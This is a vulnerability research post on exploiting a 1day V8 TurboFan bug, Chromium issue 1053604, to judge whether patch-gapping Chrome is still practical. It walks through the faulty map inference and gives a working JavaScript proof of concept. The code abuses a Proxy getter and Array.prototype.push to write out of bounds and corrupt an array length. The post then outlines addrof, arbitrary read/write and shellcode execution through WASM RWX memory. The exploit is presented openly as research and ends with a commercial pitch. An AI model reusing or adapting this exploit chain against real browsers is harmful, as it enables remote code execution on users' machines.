A EULOGY FOR PATCH-GAPPING CHROME

Authors: István Kurucsai and Vignesh S Rao

In 2019 we looked at patch gapping Chrome on two separate occasions. The conclusion was that exploiting 1day vulnerabilities well before the fixes are distributed through the stable channel is feasible, giving potential attackers 0day-like capabilities using nothing but known vulnerabilities. This was the result of a combination of factors:

  • the 6-week release cycle of Chrome, with only occasional releases in between
  • the open-source development model that makes security fixes public before they are released to end-users
  • the fact that regression tests are often included with patches, which reduces exploit development time significantly; achieving the initial corruption is often the hardest part of a browser/JS engine exploit, as the rest can be reused from previous exploits with relative ease

Mozilla tackles the issue by withholding security-critical fixes from public source repositories right up to the point of a release and by not including regression tests with them. Google went with an aggressive release schedule instead, first moving the stable channel to a biweekly cycle, then pushing even further with what appear to be weekly releases in February.

This post examines whether leveraging 1day vulnerabilities in Chrome is still practical by analyzing and exploiting a vulnerability in TurboFan. Some details of v8 that were already discussed in our previous posts will be glossed over, so we recommend reading them as a refresher.

The vulnerability

We will be looking at Chromium issue 1053604 (restricted for the time being), fixed on the 19th of February. It has all the characteristics of a promising 1day candidate: a simple but powerful-looking regression test, incorrect modeling of side effects, and an easy-to-understand one-line change. The CL with the patch can be found here; the abbreviated code of the affected function can be seen below.

NodeProperties::InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(
    JSHeapBroker* broker, Node* receiver, Node* effect,
    ZoneHandleSet<Map>* maps_return) {
  ...
  InferReceiverMapsResult result = kReliableReceiverMaps;
  while (true) {
    switch (effect->opcode()) {
      ...
      case IrOpcode::kCheckMaps: {
        Node* const object = GetValueInput(effect, 0);
        if (IsSame(receiver, object)) {
          *maps_return = CheckMapsParametersOf(effect->op()).maps();
          return result;
        }
        break;
      }
      case IrOpcode::kJSCreate: {
        if (IsSame(receiver, effect)) {
          base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);
          if (initial_map.has_value()) {
            *maps_return = ZoneHandleSet<Map>(initial_map->object());
            return result;
          }
          // We reached the allocation of the {receiver}.
          return kNoReceiverMaps;
        }
+       result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.
        break;
      }
      ...
    }
    // Stop walking the effect chain once we hit the definition of
    // the {receiver} along the {effect}s.
    if (IsSame(receiver, effect)) return kNoReceiverMaps;

    // Continue with the next {effect}.
    effect = NodeProperties::GetEffectInput(effect);
  }
}

The changed function, NodeProperties::InferReceiverMapsUnsafe, is called through the MapInference::MapInference constructor. It walks the effect chain of the compiled function backward from the use of an object as the receiver of a function call to find the set of possible maps that the object can have. For example, when encountering a CheckMaps node on the effect chain, the compiler can be sure that the map of the object can only be the one that the CheckMaps node verifies. In the case of the JSCreate node indicated in the vulnerability, if it creates the very receiver the compiler is trying to infer the possible maps for, the initial map of the created object is returned. However, if the JSCreate is for a different object than the receiver, it is assumed that it cannot change the map of the receiver. The vulnerability results from this oversight: JSCreate accesses the prototype of the new target, and that access can be intercepted by a Proxy, causing arbitrary user JS code to execute in the middle of the effect chain.
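This interception can be demonstrated in isolation. Below is a minimal sketch (the spy name is ours for illustration): constructing with a new target wrapped in a Proxy runs the get trap for 'prototype' before the new object is allocated.

function empty() {}
const spy = new Proxy(empty, {
  get(target, prop, receiver) {
    // runs while JSCreate sets up the new object's prototype
    if (prop === 'prototype') console.log('prototype access intercepted');
    return Reflect.get(target, prop, receiver);
  }
});
Reflect.construct(empty, [], spy);  // logs 'prototype access intercepted'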

In the patched version, if a JSCreate is encountered on the effect chain, the inference result is marked as unreliable. The compiler can still optimize based on the inferred maps but has to guard for them explicitly, fixing the issue.

The MapInference class is used mainly by the JSCallReducer optimizer of TurboFan, which attempts to special-case or inline some function calls based on the inferred maps of their receiver objects. The regression test included with the patch is shown below.

let a = [0, 1, 2, 3, 4];
function empty() {}
function f(p) {
  a.pop(Reflect.construct(empty, arguments, p));
}
let p = new Proxy(Object, {
  get: () => (a[0] = 1.1, Object.prototype)
});
function main(p) {
  f(p);
}
%PrepareFunctionForOptimization(empty);
%PrepareFunctionForOptimization(f);
%PrepareFunctionForOptimization(main);
main(empty);
main(empty);
%OptimizeFunctionOnNextCall(main);
main(p);

The issue is triggered in function f, through Array.prototype.pop. The Reflect.construct call is turned into a JSCreate operation, which runs user JS code if the new target is a Proxy that intercepts the prototype access. While pop takes no arguments, passing it the return value of Reflect.construct ensures that there is an effect edge between the resulting JSCreate and JSCall nodes, which is what allows the vulnerability to be triggered.

The function implementing the reduction of calls to Array.prototype.pop is JSCallReducer::ReduceArrayPrototypePop; its abbreviated code is shown below.

Reduction JSCallReducer::ReduceArrayPrototypePop(Node* node) {
  ...
  Node* receiver = NodeProperties::GetValueInput(node, 1);
  Node* effect = NodeProperties::GetEffectInput(node);
  Node* control = NodeProperties::GetControlInput(node);
  MapInference inference(broker(), receiver, effect);
  if (!inference.HaveMaps()) return NoChange();
  MapHandles const& receiver_maps = inference.GetMaps();
  std::vector<ElementsKind> kinds;
  if (!CanInlineArrayResizingBuiltin(broker(), receiver_maps, &kinds))  {
    return inference.NoChange();
  }
  if (!dependencies()->DependOnNoElementsProtector()) UNREACHABLE();
  inference.RelyOnMapsPreferStability(dependencies(), jsgraph(), &effect, control, p.feedback());
  std::vector<Node*> controls_to_merge;
  std::vector<Node*> effects_to_merge;
  std::vector<Node*> values_to_merge;
  Node* value = jsgraph()->UndefinedConstant();
  Node* receiver_elements_kind = LoadReceiverElementsKind(receiver, &effect, &control);
  Node* next_control = control;
  Node* next_effect = effect;
  for (size_t i = 0; i < kinds.size(); i++) {
    // inline pop for every inferred receiver map element kind and dispatch
    // as appropriate
    ...
  }
  ...
}

If the receiver maps of the call can be inferred, the reducer replaces the JSCall to the runtime Array.prototype.pop with an implementation specialized to the element kinds of the inferred maps. The MapInference constructor invokes NodeProperties::InferReceiverMapsUnsafe, which infers the map(s) and, in the vulnerable version, also returns kReliableReceiverMaps. Based on this return value, RelyOnMapsPreferStability won't insert map checks or code dependencies. This changes in the patched version, as encountering a JSCreate during the effect chain walk changes the return value to kUnreliableReceiverMaps, which makes RelyOnMapsPreferStability insert the needed checks.
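Semantically, the specialized fast path for a PACKED_SMI_ELEMENTS receiver behaves roughly like the JS-level sketch below (our approximation, not v8 source). The important point is that nothing in it re-validates the element kind once the inferred maps were deemed reliable.

// Rough model of the inlined pop for a packed SMI array: both the element
// load and the length update assume a store of tagged SMI values.
function inlinedPop(arr) {
  const len = arr.length;
  if (len === 0) return undefined;  // empty fast path
  const value = arr[len - 1];       // load assuming the SMI element kind
  arr.length = len - 1;             // shrink without re-checking the map
  return value;
}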

So what happens in the regression test? The array a is defined with the PACKED_SMI_ELEMENTS element kind. When the f function is optimized on the third invocation of main, Reflect.construct is turned into a JSCreate node and a.pop into a JSCall, with an effect edge between the two. The JSCall is then reduced based on the inferred map information, which is incorrectly marked as reliable, so no map check will be done after the Reflect.construct call. When invoked with the Proxy argument, the user JS code changes the element kind of a to PACKED_DOUBLE_ELEMENTS, yet the inlined pop operates on it as if it were still a packed SMI array, leading to a type confusion.
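As a refresher, the elements-kind transitions involved can be triggered from plain JS and observed with %DebugPrint in a debug build of d8 (run with --allow-natives-syntax):

let arr = [0, 1, 2, 3];  // PACKED_SMI_ELEMENTS
arr[0] = 1.1;            // transitions to PACKED_DOUBLE_ELEMENTS (unboxed 64-bit doubles)
arr[1] = {};             // transitions to PACKED_ELEMENTS (tagged pointers)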

There are many call sites of the MapInference constructor, but the ones that look most immediately useful are the JSCallReducer handlers for the pop, push and shift array functions.

Exploitation

To exploit the vulnerability, it is first necessary to understand pointer compression, a recent improvement to v8. It is a scheme on 64-bit architectures that saves memory by using 32-bit pointers into a 4GB-aligned compressed heap that is 4GB in size. According to measurements by the developers, this saves 30-40% of the memory usage of v8. From an exploitation perspective, it has several implications:

  • on 64-bit platforms, SMIs and tagged pointers are now 32-bit in size, while doubles in unboxed array storage remain 64-bit
  • it adds the additional step of achieving arbitrary read/write within the compressed heap to an exploit

The vulnerability readily grants the addrof and fakeobj primitives, as we can treat unboxed double values as tagged pointers or the other way around. However, since pointer compression made tagged pointers 4 bytes wide, it is also possible to write out of bounds: take a DOUBLE_ELEMENTS array, turn it into a tagged/SMI ELEMENTS array in the Proxy getter, then use Array.prototype.push to add an element to the confused array. The code below uses this to modify the length of a target array to an arbitrary value.

let a = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];  // HOLEY_DOUBLE_ELEMENTS
var b;
a.pop();
a.pop();
a.pop();
function empty() {}
function f(nt) {
    // the comparison is always false (typeof yields a string); it merely keeps
    // a use of the Reflect.construct result, so the crafted double is always pushed
    a.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);
}
let p = new Proxy(Object, {
    get: function() {
        a[0] = {};                       // transition a to HOLEY_ELEMENTS
        b = [0.2, 1.2, 2.2, 3.2, 4.3];   // target array, allocated after a's shrunken elements store
        return Object.prototype;
    }
});
function main(o) {
  return f(o);
}
%PrepareFunctionForOptimization(empty);
%PrepareFunctionForOptimization(f);
%PrepareFunctionForOptimization(main);
main(empty);
main(empty);
%OptimizeFunctionOnNextCall(main);
main(p);
console.log(b.length);   // prints 819

When the a[0] = {} assignment in the Proxy getter converts a to HOLEY_ELEMENTS storage, its elements store is reallocated and the unboxed double values are converted to HeapNumbers, which are referenced through compressed pointers and contain a map and the 64-bit double value. This halves the size of the elements store, yet the subsequent push still treats the array as if it had HOLEY_DOUBLE storage, writing 8 bytes at offset length*8 instead of 4 bytes at offset length*4. We use this out-of-bounds write to corrupt the length of the b array.
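The pushed constant is chosen so that the four bytes landing on the length field of b decode to the desired SMI. A sketch of how such a value can be derived, assuming (as in the layout above) that the low half of the stored double overlaps the length field:

function lengthAsDouble(len) {
  const buf = new ArrayBuffer(8);
  const f64 = new Float64Array(buf);
  const u32 = new Uint32Array(buf);
  u32[0] = len << 1;    // SMIs are encoded as value << 1 under pointer compression
  u32[1] = 0x42424242;  // the upper half does not reach the length field
  return f64[0];        // lengthAsDouble(819) yields 156842065920.05
}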

At this point, the corrupted array can be conveniently used for relative OOB reads and writes with unboxed double values. From here on, exploitation follows these steps:

  • implementing addrof: allocate an object after the corrupted float array and store the object of interest as an inline property on it; the property slot overlaps the corrupted array, so the compressed pointer can be read out as a double (see the sketch after this list).
  • getting absolute read/write access to the compressed heap: place an array with the PACKED_DOUBLE_ELEMENTS element kind after the corrupted array, use the corrupted array to point its elements store to the desired location, then read or write through it.
  • getting absolute uncompressed read/write: TypedArrays use 64-bit backing store pointers, as they will support allocations larger than what fits on the compressed heap. Placing a TypedArray after the corrupted array and modifying its backing store thus gives absolute uncompressed read/write access.
  • code execution: load a WASM module, leak the address of the RWX mapping storing the code of one of its functions, replace it with shellcode.
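A minimal sketch of the addrof step, building on the corrupted array b from above; the victim object, the overlap index IDX and the conversion buffers are our illustrative assumptions (in practice the index is found by scanning b for a known marker value):

const conv = new ArrayBuffer(8);
const f64 = new Float64Array(conv);
const u32 = new Uint32Array(conv);

const IDX = 30;             // assumed index in b overlapping victim's inline property
let victim = {leak: null};  // allocated after b, so its slot is within the OOB range

function addrof(obj) {
  victim.leak = obj;        // store a compressed tagged pointer to obj
  f64[0] = b[IDX];          // read the overlapping slot back as a raw double
  return u32[0] - 1;        // untag: heap object pointers have the low bit set
}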

The exploit code can be found here. Note that there’s no sandbox escape vulnerability included.

Conclusion

It took us around 3 days to exploit the vulnerability after discovering the fix. Considering that a potential attacker would also have to couple this with a sandbox escape and integrate it into their own framework, it seems safe to say that 1day vulnerabilities are impractical to exploit on a weekly or biweekly release cycle, hence the title of this post.

Another interesting development that affects exploit development for v8 is pointer compression. It does not complicate matters significantly (it was not meant to, anyway) but it might present interesting new avenues for exploitation. For example, the structures that reside at the beginning of the heap, such as the roots, the native context and the table of builtins, are now all at predictable and writable compressed addresses.

The timely analysis of these 1day and nday vulnerabilities is one of the key differentiators of our Exodus nDay Subscription. It enables our customers to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organizations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.